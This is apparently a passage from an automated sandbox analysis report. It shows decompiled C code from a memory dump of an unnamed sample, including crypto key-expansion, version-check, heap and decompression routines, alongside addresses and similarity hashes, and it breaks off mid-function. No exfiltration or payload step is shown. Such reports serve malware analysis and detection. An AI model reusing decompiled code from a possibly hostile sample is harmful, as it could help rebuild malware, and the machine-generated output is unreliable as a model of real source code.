				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































          0x001f3eb3
          0x001f3ecd
          0x001f3ed5
          0x001f3edd
          0x001f3edd
          0x001f3ee9
          0x001f3eec
          0x001f3eec
          0x001f3ef8
          0x001f3efe
          0x001f3f04
          0x001f3f0a
          0x001f3f0e
          0x001f3f17
          0x001f3f20
          0x001f3f26
          0x001f3f2f
          0x001f3f39
          0x001f3f41
          0x001f3f49
          0x001f3f51
          0x001f3f59
          0x001f3f61
          0x001f3f65
          0x001f3f69
          0x001f3f6d
          0x001f3f71
          0x001f3f75
          0x001f3f7d
          0x001f3f81
          0x001f3f85
          0x001f3f85
          0x001f3f99
          0x001f3f9f
          0x001f3fa3
          0x001f3fa9
          0x001f3fac
          0x001f3fae
          0x001f3fb0
          0x001f3fb4
          0x001f3fb8
          0x001f3fbb
          0x001f3fbf
          0x001f3fd3
          0x001f3fd9
          0x001f3fdd
          0x001f3fe3
          0x001f3fe6
          0x001f3fea
          0x001f3fee
          0x001f3ff1
          0x001f3ffd
          0x001f400f
          0x001f4015
          0x001f4019
          0x001f401f
          0x001f4022
          0x001f4024
          0x001f4026
          0x001f402a
          0x001f402e
          0x001f4031
          0x001f4035
          0x001f4049
          0x001f404f
          0x001f4053
          0x001f4059
          0x001f405c
          0x001f4060
          0x001f4064
          0x001f4067
          0x001f406f
          0x001f4083
          0x001f408b
          0x001f4091
          0x001f4094
          0x001f4096
          0x001f4098
          0x001f409c
          0x001f40a0
          0x001f40a3
          0x001f40b3
          0x001f40b9
          0x001f40bd
          0x001f40c3
          0x001f40c6
          0x001f40ca
          0x001f40ce
          0x001f40d1
          0x001f40d5
          0x001f40d9
          0x001f40eb
          0x001f40f1
          0x001f40f5
          0x001f40fb
          0x001f40fe
          0x001f4100
          0x001f4102
          0x001f4106
          0x001f4111
          0x001f411d
          0x001f4123
          0x001f4127
          0x001f412d
          0x001f4130
          0x001f4134
          0x001f4138
          0x001f413b
          0x001f413f
          0x001f4143
          0x001f4155
          0x001f415b
          0x001f415f
          0x001f4165
          0x001f4168
          0x001f416a
          0x001f416c
          0x001f4170
          0x001f417b
          0x001f4187
          0x001f418d
          0x001f4191
          0x001f4195
          0x001f419b
          0x001f419e
          0x001f41a0
          0x001f41a2
          0x001f41a6
          0x001f41aa
          0x001f41ae
          0x001f41b1
          0x001f41b5
          0x001f41b9
          0x001f41c0
          0x001f41cd
          0x001f41cf
          0x001f41d3
          0x001f41dd
          0x001f41e0
          0x001f41e2
          0x001f41e4
          0x001f41e8
          0x001f41ec
          0x001f41ef
          0x001f41ff
          0x001f4205
          0x001f4209
          0x001f420d
          0x001f4213
          0x001f4216
          0x001f4218
          0x001f421a
          0x001f421e
          0x001f4222
          0x001f4226
          0x001f4229
          0x001f422d
          0x001f4231
          0x001f4238
          0x001f4245
          0x001f424b
          0x001f424f
          0x001f4255
          0x001f4258
          0x001f425a
          0x001f425c
          0x001f4260
          0x001f4264
          0x001f4267
          0x001f4277
          0x001f427d
          0x001f4281
          0x001f4285
          0x001f428b
          0x001f428e
          0x001f4290
          0x001f4292
          0x001f4296
          0x001f4299
          0x001f429d
          0x001f42a1
          0x001f42a5
          0x001f42a9
          0x001f42bb
          0x001f42c1
          0x001f42c5
          0x001f42cb
          0x001f42ce
          0x001f42d0
          0x001f42d2
          0x001f42d6
          0x001f42e1
          0x001f42ed
          0x001f42ef
          0x001f42f3
          0x001f42f7
          0x001f42f9
          0x001f4300
          0x001f4302
          0x001f4304
          0x001f4308
          0x001f4310
          0x001f4313
          0x001f4316
          0x001f431a
          0x001f431e
          0x001f4322
          0x001f4326
          0x001f432a
          0x001f4335
          0x001f433c
          0x001f4343
          0x001f434a
          0x001f434e
          0x001f4352
          0x001f4359
          0x001f4359
          0x001f4366
          0x001f436a
          0x001f436d
          0x001f4370
          0x001f437f

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: gj
          • API String ID: 0-4203073231
          • Opcode ID: cec1b0839fe0e7e53828acf05d1da3ce1043d50940c2b7b9813a00f2e8882c4f
          • Instruction ID: 277a57018692cebae631a5fe71f4a4d3a99039a798ff43c1fbf09b8bf00b9f18
          • Opcode Fuzzy Hash: cec1b0839fe0e7e53828acf05d1da3ce1043d50940c2b7b9813a00f2e8882c4f
          • Instruction Fuzzy Hash: 70F1E4B2A083419FC748CF29D880A1AFBE1BFC8208F15896EF598D7715D734E9458F56
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FA995, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FA995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0x22d020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0x2300f0; // 0xa
					_t13 =  *0x2300f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0x22d020 = _t12;
					 *0x2300f0 = _t6;
					 *0x2300f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







          0x001fa998
          0x001fa9a7
          0x001fa9e5
          0x001fa9ea
          0x001fa9a9
          0x001fa9af
          0x001fa9ba
          0x001fa9c0
          0x001fa9c6
          0x001fa9cc
          0x001fa9d2
          0x001fa9d8
          0x001fa9dd
          0x001fa9dd
          0x001fa9f3
          0x00000000
          0x001fa9f5
          0x00000000
          0x001fa9f8

          APIs
          • GetVersionExW.KERNEL32(?), ref: 001FA9BA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Version
          • String ID:
          • API String ID: 1889659487-0
          • Opcode ID: 8f9ee677a6feb28262f34ebe3aabb198b3c5cf2ce8b64907e28414cf30bb23f9
          • Instruction ID: d8a7103c4da058783201837cd1917e022b7ae56d23c17c4897c070c8d77b671e
          • Opcode Fuzzy Hash: 8f9ee677a6feb28262f34ebe3aabb198b3c5cf2ce8b64907e28414cf30bb23f9
          • Instruction Fuzzy Hash: 74F01DB094421C8BC72CCB58FD99BF573A5FB58314F6042A5DE1943350E3B4AE859EA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FE510, Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FE510(intOrPtr __ecx, signed char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				intOrPtr _t137;
				signed char* _t139;
				void* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E0020EA80( &_v32, _a4, 0x20);
				_t141 =  &_v40 + 0xc;
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0x234330;
						do {
							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0x234130);
							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0x234130);
							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0x234130);
							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0x234130);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_a4 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_a4;
									 *_t58 = _a4 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_a4 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x234130);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x234130);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x234130);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x234130);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_a4;
									 *_t79 = _a4 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_a4 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_a4;
										 *_t53 = _a4 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_a4 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _a4 + 4;
											_t133 = _t133 + 1;
											_a4 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}






































          0x001fe516
          0x001fe526
          0x001fe529
          0x001fe52e
          0x001fe532
          0x001fe537
          0x001fe53a
          0x001fe53c
          0x001fe53e
          0x001fe542
          0x001fe589
          0x001fe58c
          0x001fe592
          0x001fe597
          0x001fe5a6
          0x001fe5b5
          0x001fe5c4
          0x001fe5d3
          0x001fe5d7
          0x001fe5d9
          0x001fe5de
          0x001fe5e5
          0x001fe616
          0x001fe61a
          0x001fe622
          0x001fe624
          0x001fe625
          0x001fe628
          0x001fe62a
          0x001fe62b
          0x001fe62b
          0x001fe630
          0x001fe630
          0x001fe630
          0x001fe63c
          0x001fe640
          0x001fe64e
          0x001fe65d
          0x001fe66c
          0x001fe67b
          0x001fe67f
          0x001fe681
          0x001fe682
          0x001fe682
          0x001fe685
          0x001fe687
          0x001fe688
          0x001fe688
          0x001fe68d
          0x001fe68d
          0x001fe68d
          0x001fe5e7
          0x001fe5ea
          0x001fe5f3
          0x001fe5f7
          0x001fe5fb
          0x001fe5fb
          0x001fe5fd
          0x001fe5fd
          0x001fe601
          0x001fe604
          0x001fe605
          0x001fe60a
          0x001fe60d
          0x001fe60d
          0x001fe60d
          0x001fe614
          0x001fe5ea
          0x001fe694
          0x001fe698
          0x001fe6d9
          0x001fe6d9
          0x00000000
          0x001fe69a
          0x001fe6a1
          0x001fe6cd
          0x001fe6cd
          0x001fe6a3
          0x001fe6a7
          0x001fe6aa
          0x001fe6ae
          0x001fe6b8
          0x001fe6bc
          0x001fe6c1
          0x001fe6c4
          0x001fe6c5
          0x001fe6cb
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fe6cb
          0x001fe6ae
          0x001fe6d0
          0x001fe6d0
          0x001fe6d2
          0x001fe6d3
          0x001fe6d3
          0x001fe6d7
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fe6d7
          0x001fe69a
          0x001fe6dc
          0x001fe6dc
          0x001fe6dc
          0x001fe597
          0x00000000
          0x001fe544
          0x001fe54f
          0x001fe555
          0x001fe559
          0x001fe562
          0x001fe565
          0x001fe568
          0x001fe569
          0x001fe56c
          0x001fe56d
          0x001fe571
          0x001fe577
          0x00000000
          0x00000000
          0x00000000
          0x001fe577
          0x001fe579
          0x001fe579
          0x001fe580
          0x001fe582
          0x001fe583
          0x001fe583
          0x001fe587
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001fe587
          0x001fe544
          0x001fe6ed
          0x001fe6ed

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: 0C#
          • API String ID: 0-2719568182
          • Opcode ID: 6c2e69637d4c3aa2440d6bed836e5b2c4f8daf103c6bcf31a20d8bfb977990a3
          • Instruction ID: 9c500baac5caf81c479040b45a44c350ef74bb256de2c7cc0b6242b3b1903f34
          • Opcode Fuzzy Hash: 6c2e69637d4c3aa2440d6bed836e5b2c4f8daf103c6bcf31a20d8bfb977990a3
          • Instruction Fuzzy Hash: 8051B4345083994EC712DF25919047EBFE1AFFA318F49489EE5D58B222D231E689CB53
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021ACA1, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0021ACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x250874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




          0x0021aca1
          0x0021aca9
          0x0021acb1

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: HeapProcess
          • String ID:
          • API String ID: 54951025-0
          • Opcode ID: 0ede412cbfbfec4f5675f932495afe1ec6696733b5099a1142ff72501ed10528
          • Instruction ID: 41594494bf5295054fd9138ab5219a3982aa33b7f34107d6330423dfbeea77d3
          • Opcode Fuzzy Hash: 0ede412cbfbfec4f5675f932495afe1ec6696733b5099a1142ff72501ed10528
          • Instruction Fuzzy Hash: E4A02230202300EF8B208F30BF0CB0C3AE8BA00BC2308A028AA0CC2230EB32C0308B00
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020589E, Relevance: .8, Instructions: 800COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 96%
          			E0020589E(intOrPtr __esi) {
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;
				intOrPtr _t333;
				signed int _t347;
				char _t356;
				unsigned int _t359;
				void* _t366;
				intOrPtr _t371;
				signed int _t381;
				char _t390;
				unsigned int _t391;
				void* _t399;
				intOrPtr _t400;
				signed int _t403;
				char _t412;
				signed int _t414;
				intOrPtr _t415;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed short _t424;
				signed int _t425;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed short _t435;
				unsigned int _t439;
				unsigned int _t444;
				signed int _t458;
				signed int _t460;
				signed int _t461;
				signed int _t464;
				signed int _t466;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				intOrPtr* _t474;
				signed int _t478;
				signed int _t479;
				intOrPtr _t483;
				unsigned int _t486;
				void* _t488;
				signed int _t491;
				signed int* _t493;
				unsigned int _t496;
				void* _t498;
				signed int _t501;
				signed int _t503;
				signed int _t511;
				void* _t514;
				signed int _t517;
				signed int _t519;
				signed int _t522;
				void* _t525;
				signed int _t528;
				signed int _t529;
				intOrPtr* _t531;
				void* _t532;
				signed int _t535;
				signed int _t537;
				signed int _t539;
				unsigned int _t546;
				void* _t548;
				signed int _t551;
				unsigned int _t555;
				void* _t557;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t566;
				void* _t569;
				signed int _t572;
				intOrPtr* _t575;
				void* _t576;
				signed int _t579;
				void* _t582;
				signed int _t585;
				signed int _t586;
				intOrPtr* _t591;
				void* _t592;
				signed int _t595;
				signed int* _t598;
				unsigned int _t600;
				signed int _t603;
				unsigned int _t605;
				signed int _t608;
				void* _t611;
				signed int _t613;
				signed int _t614;
				void* _t615;
				unsigned int _t617;
				unsigned int _t621;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				signed int _t627;
				signed int _t628;
				signed int _t629;
				unsigned int _t632;
				signed int _t634;
				intOrPtr* _t637;
				intOrPtr _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				char* _t646;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				char* _t652;
				intOrPtr* _t656;
				signed int _t657;
				void* _t658;
				void* _t661;

				L0:
				while(1) {
					L0:
					_t638 = __esi;
					_t598 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
							goto L12;
						} else {
							_t637 = _t638 + 0x8c;
						}
						while(1) {
							L3:
							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t638 + 0x9c)) != 0) {
								L99:
								_t415 = E002047DA(_t638);
								L100:
								return _t415;
							}
							L7:
							_push(_t637);
							_push(_t643);
							_t415 = E002033D3(_t638);
							if(_t415 == 0) {
								goto L100;
							}
							L8:
							_push(_t638 + 0xa0);
							_push(_t637);
							_push(_t643);
							_t415 = E0020397F(_t638);
							if(_t415 != 0) {
								continue;
							} else {
								goto L100;
							}
						}
						L10:
						_t458 = E00204422(_t638);
						__eflags = _t458;
						if(_t458 == 0) {
							goto L99;
						} else {
							_t598 = _t638 + 0x7c;
						}
						L12:
						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
							L18:
							_t314 = E001FA4ED(_t643);
							_t315 =  *(_t638 + 0x124);
							_t600 = _t314 & 0x0000fffe;
							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
								L20:
								_t627 = 0xf;
								_t316 = _t315 + 1;
								__eflags = _t316 - _t627;
								if(_t316 >= _t627) {
									L26:
									_t486 =  *(_t643 + 4) + _t627;
									 *(_t643 + 4) = _t486 & 0x00000007;
									_t318 = _t486 >> 3;
									 *_t643 =  *_t643 + _t318;
									_t488 = 0x10;
									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
									asm("sbb eax, eax");
									_t319 = _t318 & _t491;
									__eflags = _t319;
									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
									goto L27;
								} else {
									_t591 = _t638 + (_t316 + 0x29) * 4;
									while(1) {
										L22:
										__eflags = _t600 -  *_t591;
										if(_t600 <  *_t591) {
											_t627 = _t316;
											goto L26;
										}
										L23:
										_t316 = _t316 + 1;
										_t591 = _t591 + 4;
										__eflags = _t316 - 0xf;
										if(_t316 < 0xf) {
											continue;
										} else {
											goto L26;
										}
									}
									goto L26;
								}
							} else {
								_t592 = 0x10;
								_t626 = _t600 >> _t592 - _t315;
								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
								 *_t643 =  *_t643 + (_t595 >> 3);
								 *(_t643 + 4) = _t595 & 0x00000007;
								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
								L27:
								__eflags = _t460 - 0x100;
								if(_t460 >= 0x100) {
									L31:
									__eflags = _t460 - 0x106;
									if(_t460 < 0x106) {
										L96:
										__eflags = _t460 - 0x100;
										if(_t460 != 0x100) {
											L102:
											__eflags = _t460 - 0x101;
											if(_t460 != 0x101) {
												L129:
												_t461 = _t460 + 0xfffffefe;
												__eflags = _t461;
												_t493 = _t638 + (_t461 + 0x18) * 4;
												_t603 =  *_t493;
												 *(_t658 + 0x30) = _t603;
												if(_t461 == 0) {
													L131:
													 *(_t638 + 0x60) = _t603;
													_t320 = E001FA4ED(_t643);
													_t321 =  *(_t638 + 0x2de8);
													_t605 = _t320 & 0x0000fffe;
													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
														L133:
														_t628 = 0xf;
														_t322 = _t321 + 1;
														__eflags = _t322 - _t628;
														if(_t322 >= _t628) {
															L139:
															_t496 =  *(_t643 + 4) + _t628;
															 *(_t643 + 4) = _t496 & 0x00000007;
															_t324 = _t496 >> 3;
															 *_t643 =  *_t643 + _t324;
															_t498 = 0x10;
															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
															asm("sbb eax, eax");
															_t325 = _t324 & _t501;
															__eflags = _t325;
															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
															L140:
															_t629 = _t326 & 0x0000ffff;
															__eflags = _t629 - 8;
															if(_t629 >= 8) {
																_t464 = (_t629 >> 2) - 1;
																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
																__eflags = _t629;
															} else {
																_t464 = 0;
															}
															_t632 = _t629 + 2;
															__eflags = _t464;
															if(_t464 != 0) {
																_t391 = E001FA4ED(_t643);
																_t525 = 0x10;
																_t632 = _t632 + (_t391 >> _t525 - _t464);
																_t528 =  *(_t643 + 4) + _t464;
																 *_t643 =  *_t643 + (_t528 >> 3);
																_t529 = _t528 & 0x00000007;
																__eflags = _t529;
																 *(_t643 + 4) = _t529;
															}
															__eflags =  *((char*)(_t638 + 0x4c44));
															_t608 =  *(_t658 + 0x30);
															 *(_t638 + 0x74) = _t632;
															if( *((char*)(_t638 + 0x4c44)) == 0) {
																L147:
																_t503 =  *(_t638 + 0x7c);
																_t466 = _t503 - _t608;
																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
																__eflags = _t466 - _t328;
																if(_t466 >= _t328) {
																	L158:
																	__eflags = _t632;
																	if(_t632 == 0) {
																		while(1) {
																			L0:
																			_t638 = __esi;
																			_t598 = __esi + 0x7c;
																			goto L1;
																		}
																	}
																	L159:
																	_t644 =  *(_t638 + 0xe6dc);
																	do {
																		L160:
																		_t645 = _t644 & _t466;
																		_t466 = _t466 + 1;
																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
																		_t598 = _t638 + 0x7c;
																		_t644 =  *(_t638 + 0xe6dc);
																		 *_t598 =  *_t598 + 0x00000001 & _t644;
																		_t632 = _t632 - 1;
																		__eflags = _t632;
																	} while (_t632 != 0);
																	goto L161;
																}
																L148:
																__eflags = _t503 - _t328;
																if(_t503 >= _t328) {
																	goto L158;
																}
																L149:
																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
																_t468 = _t466 + _t333;
																_t646 = _t333 + _t503;
																 *(_t638 + 0x7c) = _t503 + _t632;
																__eflags = _t608 - _t632;
																if(_t608 >= _t632) {
																	L154:
																	__eflags = _t632 - 8;
																	if(_t632 < 8) {
																		goto L117;
																	}
																	L155:
																	_t347 = _t632 >> 3;
																	__eflags = _t347;
																	 *(_t658 + 0x30) = _t347;
																	_t639 = _t347;
																	do {
																		L156:
																		E0020EA80(_t646, _t468, 8);
																		_t658 = _t658 + 0xc;
																		_t468 = _t468 + 8;
																		_t646 = _t646 + 8;
																		_t632 = _t632 - 8;
																		_t639 = _t639 - 1;
																		__eflags = _t639;
																	} while (_t639 != 0);
																	goto L116;
																}
																L150:
																_t611 = 8;
																__eflags = _t632 - _t611;
																if(_t632 < _t611) {
																	goto L117;
																}
																L151:
																_t511 = _t632 >> 3;
																__eflags = _t511;
																do {
																	L152:
																	_t632 = _t632 - _t611;
																	 *_t646 =  *_t468;
																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
																	_t356 =  *((intOrPtr*)(_t468 + 7));
																	_t468 = _t468 + _t611;
																	 *((char*)(_t646 + 7)) = _t356;
																	_t646 = _t646 + _t611;
																	_t511 = _t511 - 1;
																	__eflags = _t511;
																} while (_t511 != 0);
																goto L117;
															} else {
																L146:
																_push( *(_t638 + 0xe6dc));
																_push(_t638 + 0x7c);
																_push(_t608);
																L71:
																_push(_t632);
																E002020EE();
																goto L0;
																do {
																	while(1) {
																		L0:
																		_t638 = __esi;
																		_t598 = __esi + 0x7c;
																		do {
																			while(1) {
																				L1:
																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
																					goto L12;
																				} else {
																					_t637 = _t638 + 0x8c;
																				}
																				goto L3;
																			}
																			goto L103;
																		} while (_t632 == 0);
																		__eflags =  *((char*)(_t638 + 0x4c44));
